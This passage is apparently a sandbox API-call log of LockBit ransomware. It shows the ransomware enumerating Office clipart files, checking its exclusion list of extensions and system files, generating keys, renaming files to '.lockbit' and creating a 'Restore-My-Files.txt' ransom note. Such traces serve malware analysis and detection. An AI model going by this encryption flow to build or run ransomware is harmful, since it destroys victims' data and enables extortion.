lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.702] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.703] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.703] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.703] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.703] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.703] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.703] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.703] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.703] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.703] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.703] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.703] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.703] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.703] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00058_.WMF") returned 1 [0161.703] lstrcmpiW (lpString1="ntldr", lpString2="NA00058_.WMF") returned 1 [0161.703] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00058_.WMF") returned 1 [0161.703] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00058_.WMF") returned -1 [0161.703] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00058_.WMF") returned -1 [0161.703] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00058_.WMF") returned 1 [0161.703] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00058_.WMF") returned -1 [0161.703] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.704] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00058_.WMF") returned=".WMF" [0161.704] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.704] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.704] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.705] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.705] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.705] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.705] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.705] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.705] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.705] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.705] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.705] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.705] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00058_.WMF.lockbit") returned 72 [0161.705] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00058_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00058_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0161.706] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.706] malloc (_Size=0x40068) returned 0x3f70048 [0161.706] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=3754) returned 1 [0161.706] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.707] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0161.707] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.708] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.708] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0161.708] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0161.713] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00058_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00058_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.713] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.713] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.714] free (_Block=0x1fa2ed8) [0161.714] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00058_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.714] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.714] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.715] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfdad700, ftCreationTime.dwHighDateTime=0x1bd4ae1, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdfdad700, ftLastWriteTime.dwHighDateTime=0x1bd4ae1, nFileSizeHigh=0x0, nFileSizeLow=0x1324, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00068_.WMF", cAlternateFileName="")) returned 1 [0161.715] lstrcmpiW (lpString1=".", lpString2="NA00068_.WMF") returned -1 [0161.715] lstrcmpiW (lpString1="..", lpString2="NA00068_.WMF") returned -1 [0161.715] PathFindExtensionW (pszPath="NA00068_.WMF") returned=".WMF" [0161.715] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.715] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.715] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.715] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.715] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.715] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.715] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.715] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.715] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.715] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.715] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.715] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.715] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.715] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.715] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.716] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.716] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00068_.WMF") returned 1 [0161.717] lstrcmpiW (lpString1="ntldr", lpString2="NA00068_.WMF") returned 1 [0161.717] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00068_.WMF") returned 1 [0161.717] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00068_.WMF") returned -1 [0161.717] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00068_.WMF") returned -1 [0161.717] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00068_.WMF") returned 1 [0161.717] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00068_.WMF") returned -1 [0161.717] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.717] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00068_.WMF") returned=".WMF" [0161.717] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.717] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.717] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.718] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.718] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00068_.WMF.lockbit") returned 72 [0161.718] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00068_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00068_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.724] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.724] malloc (_Size=0x40068) returned 0x3df0008 [0161.724] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4900) returned 1 [0161.724] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.724] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.724] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.725] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.725] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0161.728] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00068_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00068_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.728] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.728] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.729] free (_Block=0x1fa2ed8) [0161.729] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00068_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.730] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.730] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.730] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99589d00, ftCreationTime.dwHighDateTime=0x1bd4b20, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x99589d00, ftLastWriteTime.dwHighDateTime=0x1bd4b20, nFileSizeHigh=0x0, nFileSizeLow=0x1384, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00238_.WMF", cAlternateFileName="")) returned 1 [0161.730] lstrcmpiW (lpString1=".", lpString2="NA00238_.WMF") returned -1 [0161.730] lstrcmpiW (lpString1="..", lpString2="NA00238_.WMF") returned -1 [0161.730] PathFindExtensionW (pszPath="NA00238_.WMF") returned=".WMF" [0161.730] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.730] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.730] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.730] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.730] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.730] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.730] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.730] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.730] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.730] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.731] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.731] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.731] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.731] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.731] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.731] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.731] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.731] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.731] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.731] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.731] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.731] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.731] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.732] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.732] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00238_.WMF") returned 1 [0161.732] lstrcmpiW (lpString1="ntldr", lpString2="NA00238_.WMF") returned 1 [0161.732] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00238_.WMF") returned 1 [0161.733] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00238_.WMF") returned -1 [0161.733] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00238_.WMF") returned -1 [0161.733] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00238_.WMF") returned 1 [0161.733] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00238_.WMF") returned -1 [0161.733] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.733] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00238_.WMF") returned=".WMF" [0161.733] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.733] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.733] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.734] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.734] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.734] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.734] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.734] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.734] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.734] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.734] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.734] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00238_.WMF.lockbit") returned 72 [0161.734] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00238_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00238_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0161.735] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.735] malloc (_Size=0x40068) returned 0x3e70008 [0161.735] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=4996) returned 1 [0161.735] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.736] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0161.736] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.736] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0161.737] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: 